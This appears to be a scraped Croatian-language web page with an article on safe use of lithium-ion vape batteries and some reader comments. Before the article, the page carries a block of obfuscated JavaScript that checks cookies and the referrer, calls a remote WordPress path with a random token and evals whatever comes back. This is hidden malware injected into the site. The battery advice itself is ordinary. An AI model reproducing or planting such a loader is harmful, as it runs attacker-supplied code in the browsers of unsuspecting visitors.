;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Sigurno korištenje baterija za vape – osnove stvari kojih se trebamo pridržavati

Svi smo čuli priče o e-cigaretama koje eksplodiraju i nanose ozljede. No činjenica je da su baterije za e-cigarete zapravo iznimno sigurne kada se korisnici brinu o njima i pravilno ih koriste.

Baterije koje se koriste u vaping uređajima su istog sastava kao i baterije koje se koriste u mobitelima i prijenosnim računalima: litij-ionske. Litij-ionske baterije dugo su se koristile zbog svojih performansi i sigurnosti u gotovo svakom baterijskom uređaju koji je izašao u posljednjih nekoliko desetljeća. Zašto su onda baterije za e-cigaretu na lošem glasu?

Vidite, radi se o načinu na koji se koriste. Baterije u glavnoj elektronici testirane su kako bi zadovoljile najviše razine stresa koje uređaj može zahtijevati. Na primjer, baterije mobitela se testiraju kako bi se osiguralo da bez obzira na to koliko energije mobitel zahtijeva, nikada neće premašiti ograničenje baterije.

S druge strane, vaping baterije se koriste u različitim uređajima s različitim zavojnicama i s različitim zahtjevima struje. To znači da od jednog uređaja do drugog, opterećenje koje se stavlja na bateriju za vaping može biti vrlo različito i zahtjevi mogu vrlo dobro premašiti granice baterije. Tada se događaju eksplozije i o tome slušate u vijestima sljedećeg dana.

Ipak, nema potrebe za uznemiravanjem – eksplozije se 100% mogu izbjeći ako pravilno postupate i brinete o svojim baterijama. Kada čujete horor priče o eksplodirajućim baterijama, to se gotovo uvijek svodi na pogrešku korisnika.

Slijedite ove savjete o sigurnosti baterije za vaping i nikada nećete imati problema. Imajte na umu da ako koristite mehanički mod, također biste trebali dobro razumjeti Ohmov zakon.

Ostanite u granicama amperaže

Ostati unutar granice amperaže baterije posebno je važno kada koristite mehanički mod. Sve baterije imaju ograničenje jačine struje koju mogu sigurno izbaciti bez preopterećenja.

Uvijek ostanite unutar granice amperaže vaše baterije. Većina baterija je ocijenjena samo do 20-25A pa budite sigurni da ne trošite više ampera nego što vaša baterija može podnijeti.

Također, ne vjerujte uvijek ograničenju ampera ispisanom na samoj bateriji jer je to često precijenjeno. Umjesto toga, provjerite naš popis najboljih baterija za točne ocjene. U ovisnosti koje baterije koristite, ovdje ćete pronaći popise pouzdanih 18650, 20700 i 21700 baterija.

Koristite autentične baterije

Korištenje autentičnih baterija je obavezno. Krivotvorene baterije često će biti premotaji jeftinijih i manje sposobnih baterija.

Kako biste bili sigurni da kupujete originalnu bateriju, kupujte samo od pouzdanih dobavljača i specijaliziranih vape shopova.

Provjerite omote na vašim baterijama

Oštećeni omoti baterija mogu uzrokovati probleme. Redovito provjeravajte ima li oštećenja na omotima baterije i ako pronađete bilo kakve poderotine, odmah zamijenite omote. Zamjenske omote za baterije možete kupiti online ili u većini vape trgovina.

Ponovno zamotavanje baterije je jednostavno. Sve što je potrebno je sušilo za kosu i nekoliko minuta vašeg vremena. Ako niste sigurni da možete ispravno sami zamijeniti omot, većina vape shopova rado će vam pomoći i učinit će to umjesto vas.

Ne nosite baterije bez kutijice ili zaštite

Nikada ne nosite svoje baterije za vaping jednostavno ubačene u džep ili torbu. Ako baterija dođe u dodir s metalnim predmetom, može doći do kratkog spoja.

Umjesto toga, kupite futrolu za baterije ili kutijicu u kojoj možete nositi jednu ili više baterija. To će očuvati omote baterija i zaštititi vas od potencijalnih opasnosti.

Ne punite baterije bez nadzora

Iako se to rijetko događa, bolje je biti oprezan kada su baterije u pitanju. Kao i svaki elektronički uređaj, punjači baterija ponekad se mogu pokvariti.

Ne ostavljajte baterije da se pune preko noći ili dok ste izvan kuće. Pazite na punjenje baterija i pohranite ih na sigurno u kutiju za baterije kada niste u blizini.

Koristite namjenski punjač za baterije

Većina vaping uređaja ima ugrađen priključak za punjenje – ali to ne znači da biste trebali puniti svoje baterije u modu. U redu je ponekad puniti baterije u modu, na primjer, ako ste zapeli bez punjača, ali neka vam to ne postane navika.

Vaping modovi su napravljeni za vape, a ne za punjenje. Punjenje putem vašeg moda može dovesti do neravnomjernog punjenja baterije i to može smanjiti vijek trajanja vaših baterija.

Najbolji način za punjenje baterija je korištenje namjenskog punjača za vape baterije. Ovi punjači su relativno jeftini i napravljeni su za jednu i samo jednu svrhu: sigurno i ravnomjerno punjenje vaših baterija.

Korištenje namjenskog punjača produžit će život vaših baterija i osigurati njihovo sigurno punjenje.

Zamijenite stare baterije

Ako već neko vrijeme koristite iste baterije, možda je vrijeme da ih promijenite. Ako primijetite da dobivate manje vremena parenja nego prije ili da se vaše baterije jednostavno ne pune, možda je vrijeme da kupite nove.

Baterije gube sposobnost zadržavanja punjenja nakon nekog vremena i također postaju manje stabilne. Kupnjom novog seta baterija produžit ćete vrijeme parenja i zaštititi se.

„Vjenčajte“ vaše baterije

Ne, neće im trebati službena ceremonija. Ovo znači da ćete upariti dvije baterije koje ćete koristiti zajedno. Za uređaj s dvije baterije, htjet ćete kupiti dvije nove baterije umjesto da uparite dvije baterije koje su korištene u uređajima s jednom baterijom.

Uparivanje baterija je bitno jer to znači da će dvije baterije imati istu brzinu punjenja i pražnjenja. Ako miješate i spajate baterije, jedna baterija se može isprazniti brže od druge i to može uzrokovati pretjerano opterećenje druge baterije.

Kada su baterije uparene, koristite ih samo zajedno. Nemojte odvajati uparene baterije da biste ih koristili u uređajima s jednom baterijom, a zatim ih ponovno uparite.

Izbjegavajte ekstremne temperature

Baterije nisu predviđene za pohranjivanje ili rad na ekstremno niskim ili visokim temperaturama. Ako pohranjujete svoje baterije, pazite da koristite kućište za baterije i pazite da ne budu na izravnoj sunčevoj svjetlosti ili na nekom drugom vrućem mjestu. Isto tako, nemojte pohranjivati ​​baterije na izrazito hladnim mjestima kao što su podrum ili garaža.

Ekstremne temperature mogu degradirati, pa čak i oštetiti baterije, što ih može učiniti nesigurnima za korištenje.

Choose your Reaction!
 • Konačno sam nabavio kutijice za baterije. Taman 2 kutijice za po 4 baterije. Ne znam zašto nisam to učinio prije, no bolje ikad no nikad ;)

 • Hm, ovo sa kupovanjem autentičnih baterija u provjerenim shopovima je kod nas u Hr čista lutrija.
  Očito je da su LG HG2 neke lijeve prepakirane pod LG brand a ni Sony baterije nisu neka sreća.
  Također, netko bi pomislio da je visoka cijena neke baterije u nekim shopovima dovoljna garancija da se radi o autentičnoj bateriji,
  no to može biti i gramzivost trgovca da hoće pokupiti više novaca za istu.
  Na kraju nam preostaje ili osobno investirati novac u baterije pa ih testirati, ili poslušati iskustva drugih korisnika.
  Shopovi nažalost ne pridaju preveliku važnost ovoj problematici.
  Ono, kad kupiš 2 iste baterije pa ti jedna dođe napunjena 33% dok je druga potpuno mrtva i treba cijela vječnost da ju se probudi iz mrtvih. To se meni osobno dogodilo.
  Naravno, obje su kapacitetom daleko ispod nominalne vrijednosti od 3000 mAh.

 • Samo da nadodam, a vezano uz uparivanje/vjenčavanje baterija – jako je bitno da je taj par baterija isti. Da budem precizniji – uparujte dvije potpuno iste baterije (tipa dvije Sony VTC6, dvije LG HG2, dvije Samsung Q30,…) – naravno, pod dodatnim uvjetom da su obje kupljene istovremeno i da niti jedna od njih prije toga nije korištena solo… Dodatno – također ih punite u paru na istom punjaču, ako je to moguće (ili u samom modu, ako već nemate punjač)

Leave a Comment